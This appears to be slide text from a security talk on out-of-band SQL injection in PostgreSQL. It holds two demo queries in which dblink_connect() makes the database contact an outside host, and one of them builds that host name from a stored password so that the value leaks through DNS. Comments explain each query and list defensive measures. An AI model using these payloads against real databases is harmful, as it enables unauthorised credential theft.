2. whoami
Security Researcher @ Netsparker Ltd.
Developer @ Another Times
Writer @ Ethical Hacking “Offensive & Defensive” Book
Blog: omercitak.com
All social platforms: @Om3rCitak
19. demo
-- Demo: the statement as the database would receive it once a SQL injection
-- has landed in the username filter. Reproduced as printed on the slide; the
-- line breaks inside the connection string appear to come from slide wrapping.
-- NOTE(review): the slide does not mark which part is request input;
-- presumably everything between '% ' and the closing '%' came from the client.
--
-- What it shows: the LIKE pattern is built by concatenating the result of
-- dblink_connect(), a function from PostgreSQL's dblink extension. Evaluating
-- the WHERE clause therefore makes the database server itself attempt an
-- outbound connection to the host named in the connection string
-- (connect_timeout=2 limits that attempt to two seconds).
--
-- Defender notes:
--   * Bind the username as a query parameter instead of concatenating it into
--     the statement text.
--   * Do not install dblink where it is not needed, or revoke EXECUTE on its
--     functions from the application's database role.
--   * Deny outbound connections and external DNS resolution from the database
--     host, and alert when it tries to reach hosts outside the expected set.
SELECT *
FROM users
WHERE (username like '% '||
cast(SELECT(dblink_connect('host=test.omercitak.net user=a password=a
connect_timeout=2')) as numeric)
||'%')
20. demo
-- Demo: an injected username filter in which the dblink_connect() host name
-- is assembled from table data. Reproduced as printed on the slide; the line
-- breaks inside the expression appear to come from slide wrapping.
-- NOTE(review): the slide does not mark which part is request input;
-- presumably everything between '% ' and the closing '%' came from the client.
--
-- What it shows: the subquery (select password from users where id=7) is
-- concatenated in front of '.omercitak.net' to form the host in the connection
-- string. When the database server tries to connect, the stored value becomes
-- part of a hostname, so it can leave the network in a name lookup even though
-- the application returns nothing to the client. The query also implies that
-- the application's role can read users.password directly.
--
-- Defender notes:
--   * Bind the username as a query parameter instead of concatenating it into
--     the statement text.
--   * Do not install dblink where it is not needed, or revoke EXECUTE on its
--     functions from the application's database role.
--   * Deny outbound connections and external DNS resolution from the database
--     host; log DNS queries from database servers and alert on external
--     domains, especially names with long or random-looking leading labels.
--   * Store passwords as salted hashes and limit which columns the
--     application role may read, so that a leaked value has less worth.
SELECT *
FROM users
WHERE (username like '% '||
cast(SELECT(dblink_connect('host='||(select password from users where
id=7)||'.omercitak.net user=a password=a connect_timeout=2')) as numeric)
||'%')